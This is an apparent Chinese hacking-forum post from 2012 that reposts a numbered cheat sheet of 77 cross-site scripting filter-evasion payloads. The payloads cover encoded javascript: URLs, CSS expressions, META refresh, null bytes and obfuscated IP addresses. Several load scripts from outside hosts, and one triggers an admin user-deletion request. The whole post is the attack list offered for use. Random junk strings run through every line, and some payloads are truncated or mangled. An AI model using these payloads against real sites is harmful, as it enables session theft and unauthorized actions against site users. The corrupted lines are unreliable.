貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
+ N4 n& ~$ Q, g3 b/ B2 q
6 b! w. o/ V. q7 p) \# w (1)普通的XSS JavaScript注入: v% z( l2 b3 r4 z6 V
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, N/ E. Q6 \5 i
2 l" P& h0 B5 J1 X; O: _( Z$ ~# q (2)IMG标签XSS使用JavaScript命令
9 d3 o& }( B) u$ t9 t L8 l <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 t2 H4 t, f/ t8 Q
& I* P- N1 a. o! b! F. a
(3)IMG标签无分号无引号* y* m: }+ Y: B N. h. j& z
<IMG SRC=javascript:alert(‘XSS’)>8 f7 s7 O8 ^8 X: \
1 `: @2 ]3 y3 C (4)IMG标签大小写不敏感
4 Y0 n, L3 @, e5 ]7 J- B0 [/ } <IMG SRC=JaVaScRiPt:alert(‘XSS’)>/ _' K* h, {. |1 E
, o, P3 o4 O+ Z- K
(5)HTML编码(必须有分号)7 [1 R5 m V% M+ H0 `7 ]0 U
<IMG SRC=javascript:alert(“XSS”)>% `2 a1 \2 J! r. e d3 m4 p! `
( I5 g3 j6 b( w( | (6)修正缺陷IMG标签
' U5 y/ C" |( u <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
: u$ E' Z& x( D8 M( T! g8 W* C9 ^+ C5 g1 r3 F: ^
(7)formCharCode标签(计算器)/ x4 H; j/ C6 b8 A: I2 N3 t# J
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>7 a. V2 F2 T5 b; J u$ Q
5 k$ J" N2 g8 W4 g% K/ x/ b (8)UTF-8的Unicode编码(计算器)
7 }% \) S2 e0 I% D7 _ <IMG SRC=jav..省略..S')>
* V8 I' r# g3 s2 {, _8 F
* e# t* f, y: P4 e% S (9)7位的UTF-8的Unicode编码是没有分号的(计算器) T- P5 I: s7 B! z
<IMG SRC=jav..省略..S')>
& ]9 e0 L) Q# Q* x" J7 f
8 Y, {/ |- J( C& g( S1 r- I (10)十六进制编码也是没有分号(计算器), z, T- j* U1 b
<IMG SRC=java..省略..XSS')>6 r$ e$ s8 q) N
9 V6 ]7 ]' g8 q' v (11)嵌入式标签,将Javascript分开, }' O6 O& _) `# T
<IMG SRC=”jav ascript:alert(‘XSS’);”>. ?$ _% X/ L: @! f
; A" y. U& L/ w
(12)嵌入式编码标签,将Javascript分开
; M$ I6 ]* E" E$ k6 n7 G7 d <IMG SRC=”jav ascript:alert(‘XSS’);”>+ i8 x; V9 N5 y# _! p
4 L1 C. O: P9 C8 C8 ^
(13)嵌入式换行符( B" u2 w h4 e2 h) s9 z# T
<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ k. j% ^; R' O! J2 L1 E$ k' d8 m' d o: J7 j
(14)嵌入式回车
# `0 A' I0 I" q& x <IMG SRC=”jav ascript:alert(‘XSS’);”>6 L: ?) |6 ]+ q6 F
" M' a# |) i2 T" k; L S (15)嵌入式多行注入JavaScript,这是XSS极端的例子
- a; H7 e3 ^# x! I" } <IMG SRC=”javascript:alert(‘XSS‘)”>
$ x! O' |5 f0 x0 _6 N9 d) A7 u) ^) p N2 }! h
(16)解决限制字符(要求同页面)* f6 f2 l+ {. B7 p: i( r2 h- @* U
<script>z=’document.’</script>
+ G( w* u& C; d8 x/ m* K' }( L <script>z=z+’write(“‘</script>
3 M& E9 K: ^* L4 d7 w <script>z=z+’<script’</script>/ p/ X) K& m4 q* y: C" r' V
<script>z=z+’ src=ht’</script>$ e( O2 m& M2 }" c9 s
<script>z=z+’tp://ww’</script>
6 f. q; _% V4 r4 W <script>z=z+’w.shell’</script>
5 D* Q' n- ~# z+ ?/ h% v <script>z=z+’.net/1.’</script>
% {( i1 W, R4 A" j1 D2 O0 G/ _# j6 }3 | <script>z=z+’js></sc’</script>
, e2 x, |/ Z9 l* `! W- M9 z6 h8 \ <script>z=z+’ript>”)’</script>
1 f5 O( p% K* c: N! { <script>eval_r(z)</script>
3 u2 |9 {5 {% ~6 l1 I" Z% J
4 R5 W- G, D9 m+ }- I (17)空字符
5 `0 n' s0 R! P6 D* f; j perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out1 A, ~+ j2 |7 W; Y) K
4 E) ]8 C( k' r9 H; E
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用5 n' p% s* l% r* [4 r
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
# H. g- r: _; v4 F" |, T
& m$ @- S5 c B4 ^% b( W7 T0 } (19)Spaces和meta前的IMG标签4 j& C4 p& n! ?9 g _
<IMG SRC=” � javascript:alert(‘XSS’);”>
6 T, \5 [1 T$ X& c! h$ |, B; n3 ]2 c0 A
(20)Non-alpha-non-digit XSS! K6 Q+ M: D6 y4 A8 Z
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
8 Z$ S/ Q* ~5 J# N& ]+ J4 d1 A
- f; G* E4 o8 N4 n6 y( `! ?1 G& M (21)Non-alpha-non-digit XSS to 2
1 e4 p# U8 K9 P+ P! n0 c K <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>4 A* O8 e% j! v6 T3 O
$ n) t( z- t7 Z. E' r$ q (22)Non-alpha-non-digit XSS to 3# \% r G! e: [! t' I$ r
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
8 o" |1 z# w) X: h
( b7 S! U3 B' ? (23)双开括号( a& C& e! O2 J1 x# z- w7 j& r# B4 S( ?
<<SCRIPT>alert(“XSS”);//<</SCRIPT>4 G4 `! k4 \* P# p
: R$ u& i$ S6 l1 J% C
(24)无结束脚本标记(仅火狐等浏览器)
. W& t3 F% T! Y, w <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
2 y2 M8 s0 H) I3 e: y, R: b, h, F. }% W- q" I7 a) _
(25)无结束脚本标记2: b0 y) \" f1 o* \8 {
<SCRIPT SRC=//3w.org/XSS/xss.js>2 N z- w6 D6 i( \$ q3 n- T) t
% E* k) d8 I8 h8 M (26)半开的HTML/JavaScript XSS
+ J0 a! J- e, z <IMG SRC=”javascript:alert(‘XSS’)”
) M% f2 j/ S9 E) q. p+ @, R2 u( Y' R+ v2 M
(27)双开角括号
0 o( E( @. [' R/ u6 O <iframe src=http://3w.org/XSS.html <$ h0 z& |3 I. x
/ x% @3 W' Z' I6 e+ H) Y
(28)无单引号 双引号 分号
& C# w! [4 F# ~% Q s& e& { <SCRIPT>a=/XSS/
' j% m0 H6 j% y: d1 e, j alert(a.source)</SCRIPT>9 q+ o& ]. h/ b- a
2 Z2 b' m: s: C( z0 C (29)换码过滤的JavaScript9 P1 S! ^) P' y8 `4 }
\”;alert(‘XSS’);//
7 z/ a) ]. N* ~; o. H/ P1 L, v- L0 _3 G" \; k
(30)结束Title标签
- R; K% O; x r5 V# C </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>* C1 _/ C; A+ c9 c1 S+ W
; A6 {5 {4 ~* c& f' m; i* j1 p
(31)Input Image
$ C: t/ w8 y6 z% X/ D <INPUT SRC=”javascript:alert(‘XSS’);”>6 Q' u+ w1 K( o4 Y3 X& E1 ]5 k
# n* N) o/ l$ S8 a
(32)BODY Image# G% n( Q' T" @% _/ k
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>' s# }' Y" y3 F& b% q
+ U" K$ L3 H1 z U2 e# E" i$ Z (33)BODY标签
7 Y6 K. W# d. E8 L6 @: p/ X" V <BODY(‘XSS’)>
0 S4 }; \/ u4 Z( q) }9 S( L. A) P- j/ K2 g. l0 Q
(34)IMG Dynsrc
2 a. o4 p' w7 O# t1 J8 o. n, w1 W <IMG DYNSRC=”javascript:alert(‘XSS’)”>" ?! C& r1 ^: t
0 O5 c) z4 X' x" E& `3 t! m
(35)IMG Lowsrc
5 }! Y0 ~0 f0 U <IMG LOWSRC=”javascript:alert(‘XSS’)”>6 d2 J6 q. @) H* |2 |( \& w3 z
1 z# {/ a. ?6 W* r$ L0 K& o; ^2 c T
(36)BGSOUND2 ^. V* E1 n2 u* y* V5 c* Y7 J
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
7 Y( ^# ^4 c) |: f
0 F" T5 {" Y: B7 N (37)STYLE sheet+ w1 T; c( c/ ?* D; [! s% M
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
* |6 H3 L7 w" y2 K% d! R( H( h& L: \1 ?/ f/ ]/ y8 [, `/ w
(38)远程样式表
7 e& M9 o; P3 n <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>: ]8 n* H7 e, t! ?8 P/ Y z
: j- c: v6 M) u. C; E
(39)List-style-image(列表式)
+ k% R$ ^2 w9 D* m( W* A% ~* s <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS' m5 H4 H$ I+ o
5 r( ]7 W; N+ l) Y$ D (40)IMG VBscript
8 Q- D- u5 T* } <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
, u, `5 V, r; _% r! |$ A& t( L( z: X) A2 F& u
(41)META链接url
9 O( b" W2 f5 H8 ? <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>" E ^) T8 _) Z$ n& c6 G
" w" |. c9 r- \! j1 B2 p/ e (42)Iframe
4 [( R0 `$ D4 `5 z5 ^: C X <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> o( s8 _. ~6 d h
- G% L$ {: T5 Z) E0 I/ y+ l
(43)Frame' t: I/ g. K. y( z" b/ Q" s
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>) |5 I$ x# y0 d9 P
4 ]7 {: O+ e3 S' d& e2 I (44)Table
: w4 i S' v) U' l& l <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
. M9 z) J- }: |7 X5 c2 S# D8 I( Z5 q: P# y" i: x
(45)TD, }! L+ M1 V2 O2 Q
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
+ }: e0 n! \. H0 f% A6 ]: ?5 y; v4 Z e: H' l/ F
(46)DIV background-image
$ U% r* i% U( u, V& h <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- C6 \$ F3 K% V: Z1 G% U
6 d3 M2 @, y8 y" B: i8 }4 ]
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279) l. |& ~, M; P8 H, o
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
, p y# W! h4 Z; {6 ^) N
8 g2 h& }+ ? J5 T (48)DIV expression
( D3 k8 \- y4 [# s$ S <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
- `0 G" l& w/ U+ |
* p$ T9 E$ ]4 {8 S3 J2 f& o (49)STYLE属性分拆表达% D1 a e7 f) ?' `7 A) ^2 R
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>1 B6 A4 n* Z2 ]2 Q) s4 a R
! ^1 c7 o( ` V* h9 A
(50)匿名STYLE(组成:开角号和一个字母开头)
7 n/ N7 @) a% Y# I' P* E* F <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>$ e" g ] C7 Z7 y0 x2 V
& X# y& Y4 ~. ?% `1 C/ }8 j: g
(51)STYLE background-image" ?- N" m6 w! D' ]
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>) X4 X, Z; X5 W5 Q- M, [' H* K M' U
: |2 F# h+ U8 d2 x- p (52)IMG STYLE方式- d4 F+ z% w. Z0 o. q7 z% h
exppression(alert(“XSS”))’>+ ~3 I( `0 ]% M+ F1 Z
! l% [) e, N5 f- ]! {0 d' a (53)STYLE background
1 d. n' M' G9 L <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>+ i, u: Q s7 q( u c
( f# x& d" C& A9 D2 v% k (54)BASE. P# Z, B1 s2 o8 Z
<BASE HREF=”javascript:alert(‘XSS’);//”>/ C! X% E- K J
( e" h( O7 B! Z8 x
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 p# s" D) \0 U5 b& A <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
- Y6 e! m& m4 h8 ?$ k& T) B' r9 } e: z
(56)在flash中使用ActionScrpt可以混进你XSS的代码8 D# i* i" R: F- c1 ]5 {
a=”get”;
l) B; y7 J+ ~ b=”URL(\”";
7 m: l2 r0 J7 ]5 m. J0 M c=”javascript:”;5 D$ H1 O! u5 l0 B1 o3 b
d=”alert(‘XSS’);\”)”;/ \0 `$ ?( P; [' ?+ [+ C
eval_r(a+b+c+d);
. o0 U6 k6 n" J
* H: A" f8 p( L (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上- V- d8 o5 m8 T* N& ]+ x
<HTML xmlns:xss>: V9 R& S7 G$ u, w2 j
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
6 E8 Z! t. ^" H3 w- ? <xss:xss>XSS</xss:xss>
. U- x7 L( e( G; y% p </HTML>( [* G4 X9 G% S* X Y- h1 R
7 j# }6 Y% m' x. A- p% x) z (58)如果过滤了你的JS你可以在图片里添加JS代码来利用6 }0 t/ D$ J9 W* h5 f& d. x7 P
<SCRIPT SRC=””></SCRIPT>5 T6 n4 i7 i0 y: S
* R+ \8 a4 x* s, F (59)IMG嵌入式命令,可执行任意命令
' }! d9 Y* A( E4 {) N5 z/ O <IMG SRC=”http://www.XXX.com/a.php?a=b”>
& s5 v2 d* `4 S# n$ d$ u
! K1 A! R+ o& p/ U4 H. L2 u1 R! p (60)IMG嵌入式命令(a.jpg在同服务器)# e3 a, h l2 e& t
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
6 o- ^9 c# @2 d, Q! W$ ?0 D
* E$ Q4 F- v& r) ~" c( p9 K (61)绕符号过滤
4 V, G/ n% K. s <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
& D4 |' N% ]( N5 d" V. C L: p4 Q& q# n* ~$ i! P
(62)
# q5 c! G" r- X3 m$ l) ? <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>2 y+ v# h0 y1 `9 q
X0 w n# w+ \9 B; } (63)1 w W9 b+ c6 c6 }
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 |& w+ s7 g; g& `: o( ^
3 |9 n8 P: a! C4 z* t (64)
, A) d% h( t( a6 n- E1 c1 @ <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>; E1 i: ^: E9 p" {7 ]
3 e% m D4 K6 H# W: {' S (65)
" y b. q# _+ V6 } {" V6 c9 a# } <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>$ q' B& ~( n$ \$ }% @' F8 p3 d5 E9 @
/ G$ e# [& L+ y. K (66)
t; n6 \, ?: {! x" x <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
. c* }+ {+ [& a9 f
. B5 x2 @% o9 h: A7 w4 h/ N (67)
% s& n* X. @2 H3 y( I <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>7 f7 k a! W+ w2 {
. R3 O; @5 g, }' U$ r; ]7 D
(68)URL绕行+ Y) f" A% I4 P7 F5 K4 A4 w. @
<A HREF=”http://127.0.0.1/”>XSS</A>) x, }- E8 H1 E+ I2 w
. N) w3 a: h$ V5 N5 x (69)URL编码4 {; a; G' x# Q
<A HREF=”http://3w.org”>XSS</A>% ^* e) Q$ k V) p
0 j1 S* O7 }, Y! d! B (70)IP十进制
( A* Z& n# J& ?# v4 R <A HREF=”http://3232235521″>XSS</A>9 r( u$ G1 X9 z0 m* p) I
! i6 r# Q! Z+ g9 I4 E$ w% e7 y- ]8 S% S (71)IP十六进制
5 w8 U/ q& h4 M, t ] <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>% p3 e+ X) @8 |* ~/ t2 s2 w
5 V# v5 L4 ^# E$ u; z$ r o (72)IP八进制$ ~$ M0 i; i9 Q) J6 z- t# I; a
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
2 y k, U/ W. U% c1 w: K$ I% a$ v+ t
(73)混合编码
# o) Q8 c( X, [; U4 J+ ^. f <A HREF=”h* D" o& q, Q8 J# }! y6 A8 f5 X
tt p://6 6.000146.0×7.147/”">XSS</A>7 r8 o( {$ t1 [" _9 X
5 b2 `1 Z' T+ g+ |0 s& o& J9 y (74)节省[http:]! E7 e6 d+ J0 Y1 W1 r
<A HREF=”//www.google.com/”>XSS</A>/ m6 V1 A3 Q: O a4 C6 W) j' T5 j
* N+ R3 |9 K$ ^1 Q( K (75)节省[www], N1 G9 K: w3 }0 N: k4 }
<A HREF=”http://google.com/”>XSS</A>
* @1 u+ u' w5 y
6 a/ t( D( j- } u1 E6 _4 L: N (76)绝对点绝对DNS* e, B3 k+ W$ r1 g- g6 M
<A HREF=”http://www.google.com./”>XSS</A>
8 k/ I" C3 ~2 I) m1 z1 p# O- O( G2 N7 D2 D$ s8 ]8 D
(77)javascript链接+ P s* z k8 }# v% q( `: S- t
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对